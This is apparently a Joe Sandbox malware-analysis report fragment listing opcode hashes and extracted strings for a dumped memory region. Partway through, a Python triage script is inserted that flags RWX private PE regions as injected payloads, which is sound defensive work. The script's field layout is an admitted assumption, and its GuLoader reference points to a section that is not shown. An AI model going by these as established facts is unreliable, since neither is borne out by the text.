                                                               • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: d4f269c33dbc97f38e2a2da130dfb9b17d76bd208dd3444207d6af9a2290d8ca
                                                              • Instruction ID: 221d64af2a81d8e470ef954f47ad842f5b0b3e7efbd06307a0137e13f766cf69
                                                              • Opcode Fuzzy Hash: d4f269c33dbc97f38e2a2da130dfb9b17d76bd208dd3444207d6af9a2290d8ca
                                                              • Instruction Fuzzy Hash: D52122B520A3519FDB21CF24C945F1ABBB9FF88B28F810968E8450B641CB70EC84CBD1
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                               • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 5cae4d11a6f3ce2a8a4f713c2e0573896b2bc97b54fd696e1426e84efcbdb379
                                                              • Instruction ID: cc90e7931c02d2260528e2fa569b62702bceebc8b648b64ebc8d53a8dcdf7f03
                                                              • Opcode Fuzzy Hash: 5cae4d11a6f3ce2a8a4f713c2e0573896b2bc97b54fd696e1426e84efcbdb379
                                                              • Instruction Fuzzy Hash: D2216B76A00545EFCB12CF18C984E5EBBB2FF49340F1400A0EC015B26ACB35EE15EB90
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                               • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 77321fdf408b6883b3b74272b8834c494414fc4fc4caf8a6e77235aae9500516
                                                              • Instruction ID: c41ad1de51e4af9bfbf8f2ddd10d117a8f4d77d2ab6c528f50cd3ce4393bae78
                                                              • Opcode Fuzzy Hash: 77321fdf408b6883b3b74272b8834c494414fc4fc4caf8a6e77235aae9500516
                                                              • Instruction Fuzzy Hash: 5521E1B2704388DFEB12CFA8C440BDDBBB9FF45354F0104A9E9019B692C7799A00C761
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                               • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 77e4a75c3cdf8b75e9e8c234798505a95b58e1b6072e1e1b3be957dad1fa6847
                                                              • Instruction ID: cb133cfd19954115939716fce4f715589519094c9f60fd671afab93ce8c2276c
                                                              • Opcode Fuzzy Hash: 77e4a75c3cdf8b75e9e8c234798505a95b58e1b6072e1e1b3be957dad1fa6847
                                                              • Instruction Fuzzy Hash: CCF0FA72204340AFD731DF09CC05F9BBBFDEF84B50F180518E94293091CAA0B909C660
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                               • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: W
                                                              • API String ID: 0-655174618
                                                              • Opcode ID: c120437e84daec71c0f260311768e34ac1a5c88ca9c568dddc973dcbdd8a3623
                                                              • Instruction ID: 90b9239556ac808049999a1418372b50117b2a82f930aae8b6fc849696c5d57d
                                                              • Opcode Fuzzy Hash: c120437e84daec71c0f260311768e34ac1a5c88ca9c568dddc973dcbdd8a3623
                                                              • Instruction Fuzzy Hash: 01A146B5E007A98FDB20CF24CD80BD9B7B1AB49305F0044EADC59A7241EB34AB81DF90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                               • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                              • Instruction ID: 74b60df769ee0cc4cb059c04af503fda81aa85e39010d2c25667adbb25c61843
                                                              • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                              • Instruction Fuzzy Hash: B7614EB6D09219AFEF11CFA9C840B9EBBB9FF84754F104169E811BB250D7789E11CB60
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                               • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PreferredUILanguages
                                                              • API String ID: 0-1884656846
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: verifier.dll
                                                              • API String ID: 0-3265496382
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #
                                                              • API String ID: 0-1885708031
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Flst
                                                              • API String ID: 0-2374792617
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Actx
                                                              • API String ID: 0-89312691
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrCreateEnclave
                                                              • API String ID: 0-3262589265
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 888b17d21e7d5a7fd7240ecf40a69cc741ca576596652a43f91ac743bd205b98
                                                              • Instruction ID: 68be089a701d0b108cf682c79c7d731fe076f80de5cfa95f0b25c66c705ba5c2
                                                              • Opcode Fuzzy Hash: 888b17d21e7d5a7fd7240ecf40a69cc741ca576596652a43f91ac743bd205b98
                                                              • Instruction Fuzzy Hash: 4242A075A046168FDB18CF59C880AEEB7F6FF8A354F14856DD452AB341DB34E842CBA0
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e88106b466de00a4cbe9cbc766f5cce1a48163e833005d2171dcb4301f737216
                                                              • Instruction ID: 8d528629f316494c57427a30aa0e5bbfb0c3f8c6c443df7e43109a4412acf341
                                                              • Opcode Fuzzy Hash: e88106b466de00a4cbe9cbc766f5cce1a48163e833005d2171dcb4301f737216
                                                              • Instruction Fuzzy Hash: 1A32E4B6E00219DFDF14CF98D890BAEBBB6FF44768F140069E805AB341EB359905CB90
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 28c89a9c978f10ef3b27f3fa044545b14e4656919c7ed93d6ef1c32774d7277c
                                                              • Instruction ID: 16bff2058791b84f50ff7324c58ec503054dd6208f337ed8c0c86dcf674a2d1f
                                                              • Opcode Fuzzy Hash: 28c89a9c978f10ef3b27f3fa044545b14e4656919c7ed93d6ef1c32774d7277c
                                                              • Instruction Fuzzy Hash: 8022CF39B102568FDB09CF58D890EAAB7F2BF89354F14456DD8629B341EB30E942DF90
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 28a0e63055891129ae01e8d3f0fc8d0fcc03e6072a1b1fd64e35031a47bff2c8
                                                              • Instruction ID: c77536bc5de7b76c69ace7083cf9f3b606376fcbbb810fc1a60e2500c4cb3f9c
                                                              • Opcode Fuzzy Hash: 28a0e63055891129ae01e8d3f0fc8d0fcc03e6072a1b1fd64e35031a47bff2c8
                                                              • Instruction Fuzzy Hash: 28229E756187128FD708CF18D890E6AB3E2FF88354B544A6DE9A6CB351DB30E842DF91
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 03ea84983d56ada12427c7b9c53f662648723be766e22523d91f69e7d854b92d
                                                              • Instruction ID: 23e7cc59746a2063235b9c16379a67e3b4e9a74d0f7c530ebccb4919c02fb827
                                                              • Opcode Fuzzy Hash: 03ea84983d56ada12427c7b9c53f662648723be766e22523d91f69e7d854b92d
                                                              • Instruction Fuzzy Hash: FBC1F1B9A04306DBEB14CF58C940BAEB7BAFF54354F168269D819AB380D774ED41CB90
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4ddb665a1518e3cb3eae6c4ffe50e7b3d45fe69319f04155cea6f02274f3b911
                                                              • Instruction ID: 831a4ac7c05a126cd569f130290e31ba9da356b7a489be05110d2eddd2daaae5
                                                              • Opcode Fuzzy Hash: 4ddb665a1518e3cb3eae6c4ffe50e7b3d45fe69319f04155cea6f02274f3b911
                                                              • Instruction Fuzzy Hash: A8C133B5A06319CBEB14CF18C4D0BB973BAFB44734F454459EC429F2A5EB309962CBA0
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 32d96485c76b75dc5c372beae94cd2689f0260c90d11fbb2122621fa48f21108
                                                              • Instruction ID: 948edef4e165f5403d6236074d7faa1ef1220e6723048feb5e6cc929c20daa3c
                                                              • Opcode Fuzzy Hash: 32d96485c76b75dc5c372beae94cd2689f0260c90d11fbb2122621fa48f21108
                                                              • Instruction Fuzzy Hash: C8A159B2A14315AFEF12CFA4CC81FAE77B9AF49754F410064F900AB2A1D775AD15CBA0
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3ff7ac1fed8eb685f2fac3ffbc1061d77b3cb113fc48d4405aa9a5c461cbf6ec
                                                              • Instruction ID: 18ace5369717a51f64928998497c9739509398d9d5e5aa3c5603657aa0d9e8eb
                                                              • Opcode Fuzzy Hash: 3ff7ac1fed8eb685f2fac3ffbc1061d77b3cb113fc48d4405aa9a5c461cbf6ec
                                                              • Instruction Fuzzy Hash: E2A17779601601DFD726CF18C580A1AF7FBFF89350F24856AD58A8BA61EB71E941CF80
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b2c0392a1c86c5a7d12ddd0b59377c0dba5e6b5b49eb7cf0164f6521e4011ef0
                                                              • Instruction ID: b30f5e98dacf633df979ab01290d5cd8c9219ed5ac554ee2c90cd52692aa4661
                                                              • Opcode Fuzzy Hash: b2c0392a1c86c5a7d12ddd0b59377c0dba5e6b5b49eb7cf0164f6521e4011ef0
                                                              • Instruction Fuzzy Hash: 62B16BF8A083458FDB15CF28D480B99B7B9BB09358F64859ADC219B392DB71DC43DB90
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                              • Instruction ID: d62201436eeabcec892571a449b2923e83d6decf8690c8a4b2c68ddb89369883
                                                              • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                              • Instruction Fuzzy Hash: 2B71D579A0421A9BDB10CF64C890ABFB7FBFF04792F58411ADC41AB641E736E951CB90
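Every function block above cites the same memory-dump source, a private region at 0x35910000 that the sandbox recognised as a PE. The dump file name encodes the region's attributes, and decoding them is the quick check an analyst wants before spending time on the opcode hashes. The parser below is an added example, not Joe Sandbox tooling. Its reading of the file-name fields (process slot, dump index, unique id, 16-hex-digit base address, then protection, state and type) is an assumption inferred from this report: the three trailing values 00000040 / 00001000 / 00020000 line up with the standard Windows constants PAGE_EXECUTE_READWRITE, MEM_COMMIT and MEM_PRIVATE, which is exactly the profile of memory that was allocated and then had a PE written into it by a loader. The second sample line is constructed for contrast.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Standard Windows memory constants from winnt.h (these values are not an assumption).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80
WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80

# ASSUMED layout of the .sdmp name, inferred from the values in this report:
#   <proc>.<dump>.<uid>.<base, 16 hex digits>.<protect>.<state>.<type>.<extra>.sdmp
SOURCE_RE = re.compile(
    r"Source File:\s*(?P<proc>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<uid>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<extra>[0-9A-Fa-f]{8})\.sdmp,\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)


@dataclass(frozen=True)
class DumpRegion:
    proc: int
    dump: int
    base: int
    protect: int
    state: int
    mtype: int
    based_on_pe: bool

    @property
    def protect_name(self) -> str:
        # Mask off PAGE_GUARD / PAGE_NOCACHE / PAGE_WRITECOMBINE modifier bits.
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def state_name(self) -> str:
        return MEM_STATE.get(self.state, f"0x{self.state:x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mtype, f"0x{self.mtype:x}")

    @property
    def is_rwx(self) -> bool:
        p = self.protect & 0xFF
        return bool(p & EXEC_MASK) and bool(p & WRITE_MASK)


def parse_source_line(line: str) -> DumpRegion:
    """Parse one 'Source File: ... based on PE: ...' line; raise ValueError if it does not match."""
    m = SOURCE_RE.search(line)
    if not m:
        raise ValueError(f"not a memory-dump source line: {line!r}")
    base = int(m["base"], 16)
    if int(m["offset"], 16) != base:
        # The report prints the base twice; a mismatch means the line was garbled in extraction.
        raise ValueError("Offset does not match dump base address")
    return DumpRegion(
        proc=int(m["proc"], 16), dump=int(m["dump"], 16), base=base,
        protect=int(m["protect"], 16), state=int(m["state"], 16),
        mtype=int(m["mtype"], 16), based_on_pe=(m["pe"] == "true"),
    )


def triage(r: DumpRegion) -> str:
    """Rank a dumped region for analyst attention."""
    if r.state != 0x1000:
        return "not-committed"      # reserved or free: nothing to carve
    if r.mtype == 0x1000000:
        return "mapped-image"       # a loaded module; check its path before worrying
    if r.is_rwx and r.based_on_pe:
        return "rwx-private-pe"     # PE in writable+executable private memory: unpacked or injected payload
    if r.is_rwx:
        return "rwx-private-code"   # shellcode-style region with no PE header
    if r.based_on_pe:
        return "private-pe"         # manually mapped PE whose protections were tightened afterwards
    return "data"


def find_suspicious(lines: Iterable[str]) -> List[Tuple[str, int, str]]:
    """Return (verdict, base, line) for every source line worth carving, deduplicated by base."""
    seen = set()
    out: List[Tuple[str, int, str]] = []
    for line in lines:
        try:
            r = parse_source_line(line)
        except ValueError:
            continue
        if r.base in seen:
            continue
        seen.add(r.base)
        v = triage(r)
        if v.startswith("rwx") or v == "private-pe":
            out.append((v, r.base, line.strip()))
    return out


# Sample input: the first line is the one this report repeats under every function block
# (listed twice to show deduplication); the third is CONSTRUCTED to show a mapped image for contrast.
SAMPLE_LINES = [
    "Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true",
    "Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true",
    "Source File: 00000004.00000002.3610107598.0000000000400000.00000020.00001000.01000000.00000000.sdmp, Offset: 400000, based on PE: true",
]

if __name__ == "__main__":
    for verdict, base, _ in find_suspicious(SAMPLE_LINES):
        print(f"{verdict:18} base=0x{base:08x}")
```

Run against the report's own line, the region at 0x35910000 comes back as `rwx-private-pe`: committed, private, executable and writable, with a PE header. That is the region to carve and feed to a PE parser or YARA before looking at any individual function hash, and it is consistent with the GuLoader verdict in the signature list.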
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
• Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                              • Instruction ID: 0ed6c942d31995326fd219353069c7abf60bb90643e4313b526476bd99475f6c
                                                              • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                              • Instruction Fuzzy Hash: 7281E376E043598FDF18CF58C9807ADB7B2FF84358F66412AD825B7341DA71A944CBA0
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
• Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b704a599033275f2ada4780f68a143597288522d784aef64e3b7293e3c08c637
                                                              • Instruction ID: 10147d0d8f676e59daf33c7ce63b2f10931f22eacc8cfa8228d577a4d7f0a2ff
                                                              • Opcode Fuzzy Hash: b704a599033275f2ada4780f68a143597288522d784aef64e3b7293e3c08c637
                                                              • Instruction Fuzzy Hash: F5718C75A10628EFDB12DF98C880AAEB7B5FF4C750F505015E841AB261D735FC52CBA0
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
• Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
